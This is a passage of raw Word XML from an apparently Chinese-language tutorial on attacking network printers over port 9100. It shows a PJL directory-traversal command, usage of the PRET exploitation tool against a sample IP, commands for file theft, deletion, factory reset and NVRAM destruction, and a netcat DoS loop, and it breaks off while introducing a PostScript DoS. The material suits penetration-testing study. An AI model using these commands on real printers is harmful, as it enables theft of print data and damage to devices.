            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>@PJL FSDIRLIST NAME="0:/../../emp/data" ENTRY=1 COUNT=1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00DB1AF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4387969"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\目录遍历任意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eepherder\Desktop\通过9100端口利用pjl语言\目录遍历任意文件.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387969"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>03:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用工具PRET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#git</w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:t xml:space="preserve"> clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00671DFA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://github.com/RUB-NDS/PRET</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:t xml:space="preserve">usage: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">-h, --help            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t>show this help message and exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  -s, --safe           </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  verify if language is supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  -q, --quiet          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    suppress warnings and chit-chat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d, --debug          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    enter debug mode (show traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  -i file, --load file  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   load and run commands from file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRDefault="00F901A2" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  -o file, --log file   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00120F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F901A2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> log raw data sent to the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00F901A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F901A2" w:rsidRPr="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/pret.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>192.168.101.227 pjl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2776874"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="9" name="图片 9" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET连接打印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eepherder\Desktop\通过9100端口利用pjl语言\PRET连接打印机.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76874"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>查看当前目录:pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2574925" cy="380365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="10" name="图片 10" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET\查看当前目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eepherder\Desktop\通过9100端口利用pjl语言\PRET\查看当前目录.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4925" cy="380365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>查看状态信息:status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRPr="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2209165" cy="577850"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET\查看状态信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eepherder\Desktop\通过9100端口利用pjl语言\PRET\查看状态信息.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9165" cy="577850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看帮助:help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4040683" cy="1198880"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="12" name="图片 12" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET\查看帮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eepherder\Desktop\通过9100端口利用pjl语言\PRET\查看帮助.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7618" cy="1200938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">put  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取文件:get</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4735703" cy="2126513"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET\上传本地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eepherder\Desktop\通过9100端口利用pjl语言\PRET\上传本地文件.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46863" cy="2131524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>删除文件:</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="00120F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2838450" cy="1440815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="14" name="图片 14" descr="C:\Users\sheepherder\Desktop\通过9100端口利用pjl语言\PRET\删除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eepherder\Desktop\通过9100端口利用pjl语言\PRET\删除文件.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8450" cy="1440815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00BF52B5" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00911ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：重置出厂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00BF52B5">
      <w:r>
        <w:t>Print：可以远程打印文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00BF52B5">
      <w:r>
        <w:t>Fuzz: pret自动使用脚本进行fuzz测试，包括常见敏感目录和文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00BF52B5">
      <w:r>
        <w:t>Lock: 设置系统密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>Unlock：自动解密。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00BF52B5">
      <w:r>
        <w:t>Mirror: 将打印机中的所有文件拷贝的本地，方便进一步的分析，寻找如打印记录的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00BF52B5">
      <w:r>
        <w:t>Destroy: 十分危险的功能，对打印机的NVRAM（一种RAM）造成物理性损坏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00BF52B5" w:rsidRDefault="00BF52B5" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="002C0535" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0x04:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>其他类型攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRPr="00BF52B5" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF52B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:t>9100原始端口打印协议，利用netcat命令实现的验证性攻击代码（连接循环）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-literal"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="1F811F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc printer 9100; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="002C0535" w:rsidP="00DB1AF1">
      <w:r w:rsidRPr="002C0535">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印文档控制，用两行</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0535">
        <w:t>PostScript代码实现的循环DoS攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0535" w:rsidRDefault="002C0535" w:rsidP="002C0535">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
